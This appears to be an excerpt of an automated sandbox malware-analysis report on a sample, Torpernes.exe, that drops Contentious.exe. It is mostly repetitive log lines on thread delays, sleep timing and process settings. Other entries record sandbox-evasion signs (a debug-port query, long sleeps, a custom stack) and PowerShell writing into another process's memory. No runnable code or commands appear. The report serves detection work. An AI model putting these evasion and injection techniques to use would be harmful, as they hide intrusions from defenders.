            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeAPI/Special instruction interceptor: Address: 2D88B49
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeMemory allocated: 110000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeMemory allocated: 20DE0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeMemory allocated: 20990000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 599890Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 599771Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 599652Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 599534Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 599401Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 599281Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 599172Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 599062Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 598947Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 598837Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 598680Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 598562Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 598453Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 598343Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 598234Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 598117Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 598000Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 597890Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 597774Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 597656Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 597546Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 597434Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 597328Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 597219Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 597101Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 596984Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 596875Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 596765Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 596656Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 596546Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 596437Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 596327Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 596219Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 596102Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 595984Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 595872Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 595764Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 595655Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 595522Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 595348Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 595219Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 595075Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 594968Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 594859Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 594750Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 594640Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 594531Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 594421Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 594233Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 594125Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6149Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3468Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeWindow / User API: threadDelayed 3788Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeWindow / User API: threadDelayed 6044Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeAPI coverage: 2.0 %
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7604Thread sleep time: -3689348814741908s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180Thread sleep time: -25825441703193356s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7192Thread sleep count: 3788 > 30Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180Thread sleep time: -599890s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7192Thread sleep count: 6044 > 30Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180Thread sleep time: -599771s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180Thread sleep time: -599652s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180Thread sleep time: -599534s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180Thread sleep time: -599401s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180Thread sleep time: -599281s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180Thread sleep time: -599172s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180Thread sleep time: -599062s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180Thread sleep time: -598947s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180Thread sleep time: -598837s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180Thread sleep time: -598680s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180Thread sleep time: -598562s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180Thread sleep time: -598453s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180Thread sleep time: -598343s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180Thread sleep time: -598234s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180Thread sleep time: -598117s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180Thread sleep time: -598000s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180Thread sleep time: -597890s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180Thread sleep time: -597774s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180Thread sleep time: -597656s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180Thread sleep time: -597546s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180Thread sleep time: -597434s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180Thread sleep time: -597328s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180Thread sleep time: -597219s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180Thread sleep time: -597101s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180Thread sleep time: -596984s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180Thread sleep time: -596875s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180Thread sleep time: -596765s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180Thread sleep time: -596656s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180Thread sleep time: -596546s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180Thread sleep time: -596437s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180Thread sleep time: -596327s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180Thread sleep time: -596219s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180Thread sleep time: -596102s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180Thread sleep time: -595984s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180Thread sleep time: -595872s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180Thread sleep time: -595764s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180Thread sleep time: -595655s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180Thread sleep time: -595522s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180Thread sleep time: -595348s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180Thread sleep time: -595219s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180Thread sleep time: -595075s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180Thread sleep time: -594968s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180Thread sleep time: -594859s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180Thread sleep time: -594750s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180Thread sleep time: -594640s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180Thread sleep time: -594531s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180Thread sleep time: -594421s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180Thread sleep time: -594233s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180Thread sleep time: -594125s >= -30000sJump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\Torpernes.exeCode function: 0_2_0040615C FindFirstFileW,FindClose,0_2_0040615C
            Source: C:\Users\user\Desktop\Torpernes.exeCode function: 0_2_004056A1 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004056A1
            Source: C:\Users\user\Desktop\Torpernes.exeCode function: 0_2_00402770 FindFirstFileW,0_2_00402770
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_0040615C FindFirstFileW,FindClose,6_2_0040615C
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_00402770 FindFirstFileW,6_2_00402770
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_004056A1 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,6_2_004056A1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 599890Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 599771Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 599652Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 599534Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 599401Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 599281Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 599172Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 599062Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 598947Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 598837Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 598680Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 598562Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 598453Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 598343Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 598234Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 598117Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 598000Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 597890Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 597774Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 597656Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 597546Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 597434Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 597328Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 597219Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 597101Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 596984Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 596875Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 596765Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 596656Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 596546Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 596437Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 596327Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 596219Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 596102Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 595984Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 595872Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 595764Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 595655Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 595522Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 595348Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 595219Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 595075Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 594968Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 594859Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 594750Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 594640Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 594531Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 594421Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 594233Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeThread delayed: delay time: 594125Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Myrmecophile\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
            Source: Contentious.exe, 00000006.00000002.2928735040.0000000004A19000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
            Source: Contentious.exe, 00000006.00000002.2944378842.0000000021067000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^qEmultipart/form-data; boundary=------------------------8dcad4b8239f5aa<
            Source: Contentious.exe, 00000006.00000002.2928735040.0000000004A6B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Users\user\Desktop\Torpernes.exeAPI call chain: ExitProcess graph end nodegraph_0-3507
            Source: C:\Users\user\Desktop\Torpernes.exeAPI call chain: ExitProcess graph end nodegraph_0-3506
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_00403B4F SetWindowPos,ShowWindow,DestroyWindow,SetWindowLongW,GetDlgItem,SendMessageW,IsWindowEnabled,SendMessageW,GetDlgItem,GetDlgItem,GetDlgItem,LdrInitializeThunk,SetClassLongW,SendMessageW,GetDlgItem,ShowWindow,EnableWindow,EnableWindow,GetSystemMenu,EnableMenuItem,SendMessageW,SendMessageW,SendMessageW,lstrlenW,SetWindowTextW,DestroyWindow,CreateDialogParamW,GetDlgItem,GetWindowRect,ScreenToClient,SetWindowPos,ShowWindow,DestroyWindow,EndDialog,ShowWindow,6_2_00403B4F
            Source: C:\Users\user\Desktop\Torpernes.exeCode function: 0_2_00406183 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406183
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Writes to foreign memory regions
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Users\user\AppData\Local\Temp\Contentious.exe base: 1720000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Users\user\AppData\Local\Temp\Contentious.exe base: 19FFF4Jump to behavior
